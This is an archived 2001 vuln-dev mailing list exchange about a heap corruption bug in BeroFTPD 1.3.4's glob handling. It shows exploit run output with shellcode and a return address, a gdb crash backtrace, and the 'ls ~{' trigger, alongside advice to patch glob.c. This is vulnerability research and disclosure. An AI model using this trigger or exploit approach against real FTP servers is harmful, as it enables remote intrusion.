Vulnerability Development mailing list archives

Re: Older BeroFTPD glob

From: "Eduardo Cruz" <eduardo.cruz () tsg com>
Date: Mon, 10 Dec 2001 02:44:34 +0100

hi kf, yes by default of course it is.
And past and future "standard" wuftpd bugs will affect beroftpd.
for 1.3.4 just change the glob.c for the glob.c i attached on my last post.
And dont forget that there are a few back-time wuftpd bugs that are present
in bero. have fun :)

----- Original Message -----
From: "KF" <dotslash () snosoft com>
To: <eduardo.cruz () tsg com>; <vuln-dev () security-focus com>
Sent: Friday, January 02, 1970 12:09 AM
Subject: re: Older BeroFTPD glob

In eduardos reply I did not find it clear that BeroFTPD 1.3.4 was or was
not vuln by default compile.  I compiled it from the latest source on
the ftp server. Bare with no patches I get the following
result... which was the same with earlier versions. Again I am on a ppc
linux box:

[root@ibook root]# java wuwarez 42424242 0 localhost anonymous
Shellcode is 44 bytes long
return is 42424242
Got Socket
Sleeping so that you can attach a debugger
220 ibook FTP server (BeroFTPD 1.3.4(2) Mon Dec 1 23:09:32 EST 2003)
Sending username
331 Guest login ok, send your complete e-mail address as password.
sending mal buffer as the passwd
ÿüÿþ;230 Guest login ok, access restrictions apply.
Populate Heap...needs more work
(program exit)
[root@ibook root]#

(This is what we saw when we attached the debugger)

[root@ibook src]# ps -ef | grep ftpd
ftp       2035   790  0 14:55 ?        00:00:00 ftpd:
localhost.localdomain: anonymous
[root@ibook src]# gdb ./ftpd  2035
Program received signal SIGSEGV, Segmentation fault.
0xfeb6cfc in free () from /lib/
(gdb) bt
#0  0xfeb6cfc in free () from /lib/
#1  0x10010b58 in blkfree (av0=0x42424242) at glob.c:604
#2  0x1000dd04 in yyparse () at ftpcmd.y:1246
#3  0x10002cac in main (argc=268566528, argv=0x7ffffc74,
envp=0x1003e828) at ftpd.c:1221
#4  0xfe5e308 in __libc_start_main () from /lib/

Detaching from program: /root/BeroFTPD-1.3.4/src/./ftpd, Pid 2035


From: "Eduardo Cruz" <eduardo.cruz () tsg com> <mailto:eduardo.cruz () tsg com>
Date: Sun Dec 09, 2001  05:00:10 AM US/Pacific
To: "KF" <dotslash () snosoft com> <mailto:dotslash () snosoft com>,
<vuln-dev () security-focus com> <mailto:vuln-dev () security-focus com>
Subject: Re: Older BeroFTPD glob

Connected to localhost.
220 cimitarra FTP server (BeroFTPD 1.3.4(1) Wed May 30 18:22:32 CEST 2001)
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
230-Welcome, archive user!  This is an experimental FTP server.  If have
230-unusual problems, please report them via e-mail to root@cimitarra
230-If you do have problems, please try using a dash (-) as the first
230-of your password -- this will turn off the continuation messages that
230-be confusing your ftp client.
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
200 PORT command successful.
550 Missing }

just patch glob.c ur self, or use the mine already patched (attached).
And about the maintenance of beroftp, as far as i know is not being done
since years ago.
Anyway appart from the bugs derivating from vuftpd i dont see the point on
maintaining bero, i find it quite perfect like it is.

have fun

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